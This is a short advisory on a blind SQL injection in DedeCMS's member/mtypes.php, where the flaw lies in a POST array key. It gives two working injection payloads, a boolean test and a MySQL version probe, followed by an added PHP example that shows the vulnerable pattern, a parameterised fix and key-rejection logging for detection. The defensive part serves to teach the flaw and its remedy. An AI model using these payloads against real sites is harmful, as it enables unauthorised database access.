Requires magic_quotes_gpc = Off, so this one is of limited practical use.

The injection occurs in an array key, which makes it somewhat interesting.

This is a blind injection: it is more tedious but can still be exploited, and a tool could be written to run it automatically.

http://www.xxx.com/dede/member/mtypes.php?dopost=save
exploit:
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
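
An added example, not DedeCMS code and not from the original post: a handler that treats the keys of a submitted array as untrusted input, accepting only all-digit keys and binding them as parameters. The function name, the table `member_types` and its columns are hypothetical, and the demo assumes the pdo_sqlite extension is available.

```php
<?php
// Added example. Table, column and function names are hypothetical.
// Vulnerable pattern, for contrast: the array KEY is pasted into the SQL text,
// so filtering or escaping applied only to values never sees it:
//   foreach ($_POST['mtypename'] as $id => $name)
//       $db->query("UPDATE member_types SET mtypename='$name' WHERE mtypeid='$id'");

function save_member_types(PDO $db, array $mtypename, int $mid): array
{
    $stmt = $db->prepare(
        'UPDATE member_types SET mtypename = :name WHERE mtypeid = :id AND mid = :mid'
    );
    $rejected = [];
    foreach ($mtypename as $key => $name) {
        // PHP converts numeric-looking keys to int; cast back so ctype_digit()
        // checks the characters rather than treating a small int as an ASCII code.
        $key = (string)$key;
        if (!ctype_digit($key) || !is_string($name)) {
            $rejected[] = $key;          // keep for logging and alerting
            continue;
        }
        // Key and value are both bound, never concatenated.
        $stmt->execute([':name' => $name, ':id' => (int)$key, ':mid' => $mid]);
    }
    return $rejected;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE member_types (mtypeid INTEGER PRIMARY KEY, mid INTEGER, mtypename TEXT)');
$db->exec("INSERT INTO member_types VALUES (7, 1, 'old')");

// What PHP would hand the script for the request above (URL-decoded).
$post = [
    '7' => 'news',
    "7' and (@`'` or (56=56/*sql inject here*/)) and '3'='3" => 'c4rp3nt3r',
];

$rejected = save_member_types($db, $post, 1);
var_dump($rejected);   // the non-numeric key from the page's request
echo $db->query('SELECT mtypename FROM member_types WHERE mtypeid = 7')->fetchColumn(), "\n";
```

Logging the rejected keys gives a detection signal: a legitimate form never submits a key containing quotes or SQL keywords.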